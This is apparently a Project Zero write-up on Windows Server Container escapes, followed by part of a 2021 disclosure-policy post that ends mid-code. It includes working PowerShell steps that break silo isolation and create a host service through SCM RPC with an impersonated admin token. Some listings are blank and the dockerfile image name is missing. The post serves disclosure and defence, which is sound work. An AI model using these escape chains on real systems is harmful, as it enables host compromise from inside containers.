The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be obtained as SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done more easily without injection: you could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on GitHub.

Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible.

Microsoft had not patched the issue and it was still exploitable. They hadn't patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to force the containers to run under the ContainerUser account instead of ContainerAdministrator. As the reported issue only works when running as an administrator, that would seem to be sufficient.

However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.

While I wasn’t expecting MS to fix anything I found it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It also establishes a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic?

Research Process

The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.

Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.

Realistically it's best to just use Docker, which takes the MS-provided Go wrapper and implements the more familiar Docker CLI. While there are likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft, so it would be in scope. Note that there are two versions of Docker: Enterprise, which is only for server systems, and Desktop. I primarily used Desktop for convenience.

As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker’s server silo support.

Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:


USER ContainerUser
COPY NtObjectManager c:/NtObjectManager
CMD [ "powershell", "-noexit", "-command", \
  "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default.

Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.

Create a directory and copy the contents of the docker file to a file named dockerfile in that directory. Also copy my PowerShell module into the same directory, under a subdirectory named NtObjectManager. Then, from a command prompt in that directory, run the following commands to build and run the container.

C:\container> docker build -t test_image .
Step 1/4 : FROM
 ---> b29adf5cd4f0
Step 2/4 : USER ContainerUser
 ---> Running in ac03df015872
Removing intermediate container ac03df015872
 ---> 31b9978b5f34
Step 3/4 : COPY NtObjectManager c:/NtObjectManager
 ---> fa42b3e6a37f
Step 4/4 : CMD [ "powershell", "-noexit", "-command",   "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]
 ---> Running in 86cad2271d38
Removing intermediate container 86cad2271d38
 ---> e7d150417261
Successfully built e7d150417261
Successfully tagged test_image:latest
C:\container> docker run --isolation=process -it test_image


I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.

I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.

PS> Get-Process -Name CExecSvc
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     86       6     1044       5020              4560   6 CExecSvc

With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.

PS> Show-NtTokenEffective -User -Group -Privilege

Name                       Sid
----                       ---
User Manager\ContainerUser S-1-5-93-2-2

Name                                   Attributes
----                                   ----------
Mandatory Label\High Mandatory Level   Integrity, ...
Everyone                               Mandatory, ...
BUILTIN\Users                          Mandatory, ...
NT AUTHORITY\SERVICE                   Mandatory, ...
CONSOLE LOGON                          Mandatory, ...
NT AUTHORITY\Authenticated Users       Mandatory, ...
NT AUTHORITY\This Organization         Mandatory, ...
NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ...
LOCAL                                  Mandatory, ...
User Manager\AllContainers             Mandatory, ...

Name                          Luid              Enabled
----                          ----              -------
SeChangeNotifyPrivilege       00000000-00000017 True
SeImpersonatePrivilege        00000000-0000001D True
SeCreateGlobalPrivilege       00000000-0000001E True
SeIncreaseWorkingSetPrivilege 00000000-00000021 False

The groups didn't seem that interesting; however, looking at the privileges, we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system, including administrators. MSRC considers SeImpersonatePrivilege to be administrator equivalent, meaning that if you have it you can assume you can get to administrator. It seems ContainerUser is not quite as unprivileged as it should be.
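The Luid column in the privilege table above lines up with the well-known privilege constants in the Windows SDK's winnt.h (for example, SE_IMPERSONATE_PRIVILEGE is 29, or 0x1D). As a minimal, platform-neutral sketch, the C below models that table as plain data and asks the same question as the paragraph above: is SeImpersonatePrivilege enabled? The privilege_row type and both helper functions are hypothetical names for illustration; nothing here calls a Windows API.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical model of one row of the Show-NtTokenEffective privilege table. */
typedef struct {
    const char *name;
    unsigned long luid;   /* low part of the LUID; the high part is 0 here */
    bool enabled;
} privilege_row;

/* The four privileges reported for ContainerUser. */
static const privilege_row container_user_privs[] = {
    { "SeChangeNotifyPrivilege",       0x17, true  },
    { "SeImpersonatePrivilege",        0x1D, true  },
    { "SeCreateGlobalPrivilege",       0x1E, true  },
    { "SeIncreaseWorkingSetPrivilege", 0x21, false },
};

static const size_t container_user_priv_count =
    sizeof container_user_privs / sizeof container_user_privs[0];

/* True if a privilege with this name is present in the table and enabled. */
static bool privilege_enabled(const privilege_row *rows, size_t count,
                              const char *name)
{
    assert(rows != NULL && name != NULL);
    for (size_t i = 0; i < count; i++) {
        if (strcmp(rows[i].name, name) == 0)
            return rows[i].enabled;
    }
    return false;
}

/* Rule of thumb from the text: SeImpersonatePrivilege is treated as
   administrator equivalent. */
static bool admin_equivalent(const privilege_row *rows, size_t count)
{
    return privilege_enabled(rows, count, "SeImpersonatePrivilege");
}
```

Querying SeTcbPrivilege, which the global symbolic link feature needs, returns false for this token; the point of the paragraph is that this matters little once impersonation is available.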

That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.

Next, I used the NtObject drive provider to list the object manager namespace. For example, checking the Device directory shows what device objects are available.

PS> ls NtObject:\Device
Name                                              TypeName
----                                              --------
Ip                                                SymbolicLink
Tcp6                                              SymbolicLink
Http                                              Directory
Ip6                                               SymbolicLink
ahcache                                           SymbolicLink
WMIDataDevice                                     SymbolicLink
LanmanDatagramReceiver                            SymbolicLink
Tcp                                               SymbolicLink
LanmanRedirector                                  SymbolicLink
DxgKrnl                                           SymbolicLink
ConDrv                                            SymbolicLink
Null                                              SymbolicLink
MailslotRedirector                                SymbolicLink
NamedPipe                                         Device
Udp6                                              SymbolicLink
VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink
KsecDD                                            SymbolicLink
DeviceApi                                         SymbolicLink
MountPointManager                                 Device


Interestingly most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects. But there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There’s likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.

What about the registry? The container should be providing its own registry hives, so there shouldn't be anything accessible outside of those. After a few tests I noticed something very odd.

PS> ls HKLM:\SOFTWARE | Select-Object Name













PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name






Docker Inc.












The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:

PS> ls NtObject:\REGISTRY\USER | Select-Object Name










PS> Get-NtSid

Name                       Sid

----                       ---

User Manager\ContainerUser S-1-5-93-2-2

No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, you’d expect to see a loaded hive for that user SID. However you don’t see one, instead you see S-1-5-21-426062036-3400565534-2975477557-1001 which is the SID of the user outside the container.

Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.
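To make the relative-versus-absolute distinction concrete, here is a toy model in C. It assumes, purely for illustration, that an overlay is a table mapping a host key path to a silo-private hive, and that the bug amounts to applying that table only when a full path is opened. The overlay type, the SILO_PRIVATE key name and the open_* functions are all hypothetical; the real kernel logic is certainly more involved.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* A hypothetical overlay: opens of host_path should land in silo_path. */
typedef struct {
    const char *host_path;
    const char *silo_path;
} overlay;

/* Illustrative mapping only; the silo-side key name is made up. */
static const overlay silo_overlays[] = {
    { "\\REGISTRY\\MACHINE\\SOFTWARE", "\\REGISTRY\\SILO_PRIVATE\\SOFTWARE" },
};

/* Absolute open: the full path is checked against the overlay table
   (exact match only, to keep the sketch short). */
static void open_absolute(const char *path, char *out, size_t out_len)
{
    assert(path != NULL && out != NULL && out_len > 0);
    for (size_t i = 0; i < sizeof silo_overlays / sizeof silo_overlays[0]; i++) {
        if (strcmp(path, silo_overlays[i].host_path) == 0) {
            snprintf(out, out_len, "%s", silo_overlays[i].silo_path);
            return;
        }
    }
    snprintf(out, out_len, "%s", path);
}

/* Buggy relative open: the parent handle's path and the child name are
   joined, but the overlay table is never consulted. */
static void open_relative_buggy(const char *parent, const char *child,
                                char *out, size_t out_len)
{
    snprintf(out, out_len, "%s\\%s", parent, child);
}

/* Consistent relative open: join first, then apply the same overlay check. */
static void open_relative_fixed(const char *parent, const char *child,
                                char *out, size_t out_len)
{
    char joined[256];
    snprintf(joined, sizeof joined, "%s\\%s", parent, child);
    open_absolute(joined, out, out_len);
}
```

With the buggy join, opening MACHINE\SOFTWARE relative to \REGISTRY lands on the host path, which mirrors the difference between the two ls commands above.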

This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives.

The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.

A Little Bit of Reverse Engineering

While basic inspection had been surprisingly fruitful, shaking out anything else was likely to require some reverse engineering. I know from previous experience with Desktop Bridge how the registry overlays and object manager redirection work when combined with silos. Desktop Bridge uses application silos rather than server silos, but they take similar approaches.

The main enforcement mechanism the kernel uses to provide the container's isolation is to call a function that checks whether the process is in a silo, and then do something different based on the result. I decided to try to track down where the silo state was checked and see if I could find any misuse. You'd think the kernel would only have a few functions which return the current silo state. Unfortunately, you'd be wrong; the following is a short list of the functions I checked:

IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo

Of course that’s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive, for various reasons:

  1. We’re only checking for bad checks, not the lack of a check.
  2. The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined.
  3. We’re only checking the kernel, many of these functions are exported for driver use so could be called by other kernel components that we’re not looking at.

The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink which is a function that’s responsible for enforcing symlink checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.

For example, if you put a symbolic link in the current user's hive which redirects to the local machine hive, CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user from planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.

BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) {
  if (PsIsCurrentThreadInServerSilo()
    || !TargetHive
    || TargetHive == SourceHive) {
    return TRUE;
  }

  if (SourceHive->Flags.Trusted)
    return FALSE;

  // Check trust list.
}

Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check so is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added.
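A simplified C model of the check may help show why the ordering matters. It encodes only the rule stated in the prose (no links from an untrusted hive into a trusted one), not the kernel's exact trust-list logic, and the hive type and parameter names are hypothetical. The server_silo_bypass flag stands in for the early PsIsCurrentThreadInServerSilo() test; setting it to false approximates the patched behavior, since the fix removed that call.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical, simplified hive descriptor: only the trust bit matters here. */
typedef struct {
    const char *name;
    bool trusted;
} hive;

/*
 * Simplified model of the link rule. thread_in_server_silo is the caller's
 * state; server_silo_bypass selects whether the early silo check exists
 * (true = original behavior, false = behavior after the check was removed).
 */
static bool ok_to_follow_link(const hive *source, const hive *target,
                              bool thread_in_server_silo,
                              bool server_silo_bypass)
{
    assert(source != NULL);
    /* The early exit runs before any trust check, so it short-circuits it. */
    if ((server_silo_bypass && thread_in_server_silo) ||
        target == NULL || target == source)
        return true;
    /* Refuse links that cross from an untrusted hive into a trusted one. */
    if (!source->trusted && target->trusted)
        return false;
    return true;
}
```

Inside a server silo the untrusted-to-trusted link from the user's hive to the machine hive is allowed, which is exactly the gap the FlickInfo primitive below relies on.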

To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry.

The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.


  if (Silo) {
    PPSP_STORAGE Storage = Silo->Storage;
    PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];
    if (Slot->Present)
      return Slot->Value;
  }
  return ObpRootDirectoryObject;


We can see that the function extracts a storage slot from the passed-in silo and, if the slot is present, returns its value. If the silo is NULL or the slot isn't present, the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up, the slot is populated with a new root directory, so this function should always return the silo root directory rather than the real global root directory.

This code seems perfectly fine: if the server silo is passed in, it should always return the silo root object directory. The real question is, which silo do the callers of this function actually pass in? We can check that easily enough; there are only two callers, and they both have the following code.

PEJOB silo = PsGetCurrentSilo();


Okay, so the silo is coming from PsGetCurrentSilo. What does that do?

PEJOB PsGetCurrentSilo() {
  PETHREAD Thread = PsGetCurrentThread();
  PEJOB silo = Thread->Silo;
  if (silo == (PEJOB)-3) {
    silo = Thread->Tcb.Process->Job;
    while(silo) {
      if (silo->JobFlags & EJOB_SILO) {
        break;
      }
      silo = silo->ParentJob;
    }
  }
  return silo;
}

A silo can be associated with a thread through impersonation, or it can be one of the jobs in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches the process's job hierarchy for any job which has the EJOB_SILO flag set. If a silo is found, it's returned from the function; otherwise NULL is returned.

This is a problem, as it's not explicitly checking for a server silo. I mentioned earlier that there are two types of silo, application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore, to trick the object manager into using the real root directory, all we need to do is:

  1. Create an application silo.
  2. Assign it to a process.
  3. Fully access the root of the object manager namespace.

This is basically a more powerful version of the global symlink vulnerability but requires no administrator privileges to function. Again, as with the registry issue you’re still limited in what you can modify outside of the containers based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.

The exploit in PowerShell is pretty straightforward using my toolchain:

PS> $root = Get-NtDirectory "\"
PS> $root.FullPath
\
PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory
PS> Set-NtProcessJob $silo -Current
PS> $root.FullPath
\Silos\748

To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory the kernel makes it look like it is by returning a single backslash as the path.

We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory which we don’t want and can’t be done from a non-administrator account anyway. We can then assign the application silo to the process.

Now we can check the root directory path again. We now find the root directory is really called \Silos\748 instead of just a single backslash. This is because the kernel is now using the real root directory. At this point you can access resources on the host through the object manager.
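The change in the printed path can be modeled with a small C function, under the assumption (inferred from the behavior described above, not from kernel source) that FullPath is rendered relative to the caller's root directory. The display_path() name and the string-based representation of directories are hypothetical.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical model: render an object's host path relative to the caller's
 * root directory. A caller whose root is the silo root sees "\" for the silo
 * root itself; a caller using the global root "\" sees the full host path.
 */
static void display_path(const char *host_path, const char *caller_root,
                         char *out, size_t out_len)
{
    size_t root_len = strlen(caller_root);
    assert(out != NULL && out_len > 0);
    if (strcmp(caller_root, "\\") != 0 &&
        strncmp(host_path, caller_root, root_len) == 0 &&
        (host_path[root_len] == '\0' || host_path[root_len] == '\\')) {
        /* Strip the root prefix; an empty remainder is shown as "\". */
        const char *rest = host_path + root_len;
        snprintf(out, out_len, "%s", *rest ? rest : "\\");
    } else {
        snprintf(out, out_len, "%s", host_path);
    }
}
```

The boundary check on the character after the prefix keeps a root such as \Silos\74 from wrongly matching \Silos\748.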

Chaining the Exploits

We can now combine these issues to escape the container completely from ContainerUser. First, get hold of an administrator token through something like RogueWinRM; you can then impersonate it because you have SeImpersonatePrivilege. Then you can use the object manager root directory issue to reach the host's service control manager (SCM) through its ALPC port and create a new service. You don't even need to copy an executable outside the container, as the container's system volume is a device on the host which we can access directly.

As far as the host's SCM is concerned you're an administrator, so it'll grant you full access to create an arbitrary service. However, when that service starts it'll run on the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is that the Win32 APIs can cache the SCM's RPC handle. If any connection is made to the SCM from any part of PowerShell before installing the service, you will end up accessing the container's SCM, not the host's.
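The caching quirk can be illustrated with a toy C model in which the SCM endpoint is resolved against whichever namespace is in effect at connection time, and a wrapper keeps its first connection. Everything here (the scm_target enum, process_state, and the connect_* functions) is hypothetical and only meant to show why a connection cached before joining the application silo keeps pointing at the container's SCM.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Which service control manager a connection reaches (simplified). */
typedef enum { SCM_CONTAINER, SCM_HOST } scm_target;

/* Hypothetical per-process state for the model. */
typedef struct {
    bool escaped_namespace;   /* true after joining the application silo */
    bool have_cached_handle;  /* whether a wrapper already connected once */
    scm_target cached_target; /* where that first connection went */
} process_state;

/* The endpoint is resolved against the namespace in effect right now. */
static scm_target resolve_scm(const process_state *p)
{
    assert(p != NULL);
    return p->escaped_namespace ? SCM_HOST : SCM_CONTAINER;
}

/* Models a wrapper that connects once and reuses the handle afterwards. */
static scm_target connect_cached(process_state *p)
{
    if (!p->have_cached_handle) {
        p->cached_target = resolve_scm(p);
        p->have_cached_handle = true;
    }
    return p->cached_target;
}

/* Models connecting to the endpoint directly on every call. */
static scm_target connect_direct(const process_state *p)
{
    return resolve_scm(p);
}
```

In the model, a cached connection made before the silo switch still reaches the container's SCM afterwards, while a direct connection made after the switch reaches the host's.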

To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.

PS> $imp = $token.Impersonate()
PS> $sym_path = "$env:SystemDrive\symbols"
PS> mkdir $sym_path | Out-Null
PS> $services_path = "$env:SystemRoot\system32\services.exe"
PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt'
# You can also use the following to run a container based executable.
#$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") {
#   "\\.\GLOBALROOT" + $f.FullPath
#}
PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path
PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path |
   Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003'
PS> $client = Get-RpcClient $rpc
PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory
PS> Set-NtProcessJob $silo -Current
PS> Connect-RpcClient $client -EndpointPath ntsvcs
PS> $scm = $client.ROpenSCManagerW([NullString]::Value, `
 [NullString]::Value, `
 0x2) # SC_MANAGER_CREATE_SERVICE, the access needed to create a service
PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", `
 [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, `
 [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0)
PS> $client.RStartServiceW($service.p15, 0, $null)

For this code to work, you need an administrator token to impersonate in the $token variable. Getting that token is left as an exercise for the reader. When you run it in a container, the result should be the file hello.txt written to the root of the host’s system drive.

Getting the Issues Fixed

I have some server silo escapes; now what? I would prefer to get them fixed; however, as already mentioned, the MSRC servicing criteria state that Windows Server Containers are not a supported security boundary.

I decided to report the registry symbolic link issue immediately, as I could argue that it allowed privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows; it just required a special environment to function. This was issue 2120, which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward: the call to PsIsCurrentThreadInServerSilo was removed, as it was presumably redundant.

The issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior, so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.

The situation with the other two silo escapes was more complicated, as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try to find mitigating controls, or stop using Windows Server Containers for anything where untrusted code could ever run.

After much back and forth with various people in MSRC, a decision was made. If a container escape works from a non-administrator user (basically, if you can access resources outside of the container), then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug, which kicked this all off, still wouldn’t be eligible, as it required SeTcbPrivilege, which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.

I reported the three other issues (the ContainerUser issue was also considered to be in scope) as issues 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively.

Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.


The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed, I doubt that they’re the only ones which could be discovered and exploited. Ideally, you should never run untrusted workloads in a Windows Server Container, and such a container probably shouldn’t provide remotely accessible services either. The only realistic use case for them is internally visible services with little to no interaction with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios; this is covered in the GKE documentation.

Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle, and Hyper-V is at least a supported security boundary. However, container escapes are still useful, as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V, though, which is why GKE isn't currently using it.

Policy and Disclosure: 2021 Edition

Posted by Tim Willis, Project Zero

At Project Zero, we spend a lot of time discussing and evaluating vulnerability disclosure policies and their consequences for users, vendors, fellow security researchers, and software security norms of the broader industry. We aim to be a vulnerability research team that benefits everyone, working across the entire ecosystem to help make 0-day hard.


We remain committed to adapting our policies and practices to best achieve our mission, demonstrating this commitment at the beginning of last year with our 2020 Policy and Disclosure Trial.

As part of our annual year-end review, we evaluated our policy goals, solicited input from those that receive most of our reports, and adjusted our approach for 2021.

Summary of changes for 2021

Starting today, we're changing our Disclosure Policy to refocus on reducing the time it takes for vulnerabilities to get fixed, improving the current industry benchmarks on disclosure timeframes, as well as changing when we release technical details.

The short version: Project Zero won't share technical details of a vulnerability for 30 days if a vendor patches it before the 90-day or 7-day deadline. The 30-day period is intended for user patch adoption.

The full list of changes for 2021, comparing the 2020 Trial ("Full 90") with the 2021 Trial ("90+30"):

  1. 2020 Trial ("Full 90"): Public disclosure occurs 90 days after an initial vulnerability report, regardless of when the bug is fixed. Technical details (initial report plus any additional work) are published on Day 90. A 14-day grace period* is allowed. Earlier disclosure with mutual agreement.
     2021 Trial ("90+30"): Disclosure deadline of 90 days. If an issue remains unpatched after 90 days, technical details are published immediately. If the issue is fixed within 90 days, technical details are published 30 days after the fix. A 14-day grace period* is allowed. Earlier disclosure with mutual agreement.
  2. 2020 Trial ("Full 90"): For vulnerabilities that were actively exploited in-the-wild against users, public disclosure occurs 7 days after the initial vulnerability report, regardless of when the bug is fixed. In-the-wild vulnerabilities are not offered a grace period. Earlier disclosure with mutual agreement.
     2021 Trial ("90+30"): Disclosure deadline of 7 days for issues that are being actively exploited in-the-wild against users. If an issue remains unpatched after 7 days, technical details are published immediately. If the issue is fixed within 7 days, technical details are published 30 days after the fix. Vendors can request a 3-day grace period* for in-the-wild bugs. Earlier disclosure with mutual agreement.
  3. 2020 Trial ("Full 90"): Technical details are immediately published when a vulnerability is patched in the grace period* (e.g. patched on Day 100 in grace period, disclosure on Day 100).
     2021 Trial ("90+30"): If a grace period* is granted, it uses up a portion of the 30-day patch adoption period (e.g. patched on Day 100 in grace period, disclosure on Day 120).

Elements of the 2020 trial that will carry over to 2021:

1. Policy goals:

  • Faster patch development
  • Thorough patch development
  • Improved patch adoption

2. If Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline.

3. If a 90-day deadline is missed, technical details are made public on Day 90, unless a grace period* is requested and confirmed prior to deadline expiry.

4. If a 7-day deadline is missed, technical details are made public on Day 7, unless a grace period* is requested and confirmed prior to deadline expiry.

* The grace period is an additional 14 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 90 days, but do expect it to be fixed within 104 days. Grace periods will not be granted for vulnerabilities that are expected to take longer than 104 days to fix. For vulnerabilities that are being actively exploited and reported under the 7-day deadline, the grace period is an additional 3 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 7 days, but do expect it to be fixed within 10 days.
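The deadline arithmetic of the 2021 policy can be sketched as a small C function. This is an illustrative reading of the rules above, not Project Zero tooling: the name `disclosure_day` is hypothetical, earlier disclosure by mutual agreement is not modeled, and two points are assumptions: an issue still unpatched when its (possibly extended) deadline expires is disclosed that day, and a fix inside the 3-day in-the-wild grace period is disclosed on Day 37, by analogy with the Day 120 example.

```c
#include <stdbool.h>

/* Hypothetical helper: returns the day (counted from the initial report) on
 * which technical details would be published under a simplified reading of
 * the 2021 "90+30" policy. A negative fix_day means "never fixed".
 * Not modeled: earlier disclosure by mutual agreement. */
int disclosure_day(bool in_the_wild, bool grace_granted, int fix_day) {
    const int deadline = in_the_wild ? 7 : 90; /* disclosure deadline */
    const int grace = in_the_wild ? 3 : 14;    /* optional grace period */
    const int adoption = 30;                   /* patch adoption period */
    const int last_day = grace_granted ? deadline + grace : deadline;
    const bool fixed = fix_day >= 0;

    if (fixed && fix_day <= deadline)
        return fix_day + adoption;  /* fixed in time: 30 days after the fix */
    if (fixed && fix_day <= last_day)
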